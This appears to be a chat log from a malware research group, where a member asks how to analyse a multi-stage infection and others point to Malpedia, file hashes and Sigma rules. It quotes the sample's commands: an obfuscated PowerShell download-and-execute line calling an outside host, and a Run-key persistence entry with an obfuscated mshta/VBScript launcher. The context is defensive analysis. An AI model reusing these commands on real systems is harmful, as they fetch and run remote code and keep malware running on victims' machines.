otherwise, the lazy/confidential way would be to go to Malpedia and search for the malware name and read through the reports for its behaviours for detection
I was able to analyze the part where it downloads and compiles C# code, but I couldn't manage the part after that
"I was able to analyze the part where it downloads and compiles C# code, but I couldn't manage the part after that."
But that's just the beginning. After understanding it, what you want to do with the information is the next question...
You can research a lot of things, but that path should lead to something that you want?
Hello TK, welcome to the Malware Research group! Please read the pinned message before you post!
The URL is dead, no samples are available. If you need help with analysis, please share the hash so someone else can download it and assist you
The detection part is completed. What I want to figure out is the malware's behavior. If the C# code is running, or if it has already run, what does it do? What are the next steps?
Based on the pasted script...
A PowerShell script that connects to the Internet, which subsequently executes cmd and modifies the Run key?
Sigma rule can do that, but whether your tool can support this method of detection is another
Sam:
It all starts with these commands
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (&NeW-oBjeCt NEt.webClIeNT).doWnLoaDstRInG('[httP://]sToRKa.sTORe/Ps/06fCC253-fD2C-5a52-6f46-a0B42e64251c')|CMd
Command line: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "_06fcc253fd2c5a526f46a0b42e64251c" /t REG_SZ /F /D "mShta VbscRiPt:closE(execUTe(\"cr\"+\"eAt\"+\"eO\"+\"Bj\"+\"ect\"+\"(\"\"\"+\"WS\"+\"CRI\"+\"pt\"+\".Sh\"+\"ELl\"+\"\"\").\"+\"Run\"+\" \"\"\"+\"%_\"+\"06\"+\"FC\"+\"C25\"+\"3F\"+\"D2\"+\"C5\"+\"a5\"+\"26\"+\"F4\"+\"6a\"+\"0B4\"+\"2e\"+\"642\"+\"51c\"+\"%\"\",\"+\"0\"))"
I still don't get where the question is leading to
So you want a sample? Or know what kind of malware exhibits this behaviour? Or if you can detect such behaviour?
It all starts with one script; it connects to a C2 server, gets PowerShell scripts, then runs them, then downloads another C# code and compiles it, then the C# code starts downloading another tool. I need to research this malware
I think if you input that into Google, you are going to get tons of definitions and common execution methods
Hello @nguyen_duyhung, welcome to the Malware Research group! Please read the pinned message before you post!
New FedBan
Fed: Libra's Empire
FedAdmin: ❤🦦
User: Александр
User ID: 1351806164
Reason: scam